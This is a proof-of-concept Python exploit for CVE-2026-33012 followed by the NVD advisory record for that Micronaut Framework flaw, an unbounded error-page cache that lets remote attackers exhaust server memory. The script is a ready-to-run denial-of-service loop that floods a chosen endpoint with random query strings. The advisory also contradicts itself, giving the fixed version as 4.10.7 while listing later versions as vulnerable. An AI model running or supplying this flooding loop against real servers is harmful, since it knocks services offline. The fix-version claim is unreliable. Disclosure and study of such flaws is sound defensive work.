CVE-2026-33012

import requests import random import string def generate_random_string(length=100): return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def exploit(target_url): print(f"[+] Targeting {target_url}") try: while True: # Generate a unique long parameter to fill the cache payload = generate_random_string(200) # Assuming the endpoint echoes back the param or causes an error with it url = f"{target_url}?input={payload}" response = requests.get(url, timeout=5) print(f"Sent request with payload length {len(payload)}, Status: {response.status_code}") except KeyboardInterrupt: print("\n[-] Exploit stopped by user") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual vulnerable endpoint target = "http://localhost:8080/error" exploit(target)

{"cve": {"id": "CVE-2026-33012", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:15.200", "lastModified": "2026-03-24T21:21:44.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. Versions 4.7.0 through 4.10.16 used an unbounded ConcurrentHashMap cache with no eviction policy in its DefaultHtmlErrorResponseBodyProvider. If the application throws an exception whose message may be influenced by an attacker, (for example, including request query value parameters) it could be used by remote attackers to cause an unbounded heap growth and OutOfMemoryError, leading to DoS. This issue has been fixed in version 4.10.7."}, {"lang": "es", "value": "Micronaut Framework es un framework Java de pila completa basado en JVM diseñado para construir aplicaciones JVM modulares y fácilmente testeables. Las versiones 4.7.0 a la 4.10.16 usaban una caché ConcurrentHashMap ilimitada sin política de desalojo en su DefaultHtmlErrorResponseBodyProvider. Si la aplicación lanza una excepción cuyo mensaje puede ser influenciado por un atacante, (por ejemplo, incluyendo parámetros de valor de consulta de solicitud) podría ser usado por atacantes remotos para causar un crecimiento de heap ilimitado y OutOfMemoryError, lo que lleva a DoS. Este problema ha sido solucionado en la versión 4.10.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:objectcomputing:micronaut:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.7.0", "versionEndExcluding": "4.10.17", "matchCriteriaId": "C50C427C-305C-4A11-A5F5-E1AEB19AD09D"}]}]}], "references": [{"url": "https://github.com/micronaut-projects/micronaut-core/commit/1e2ba2c14386af3d47751732d02053a72b0b49b3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.17", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-2hcp-gjrf-7fhc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}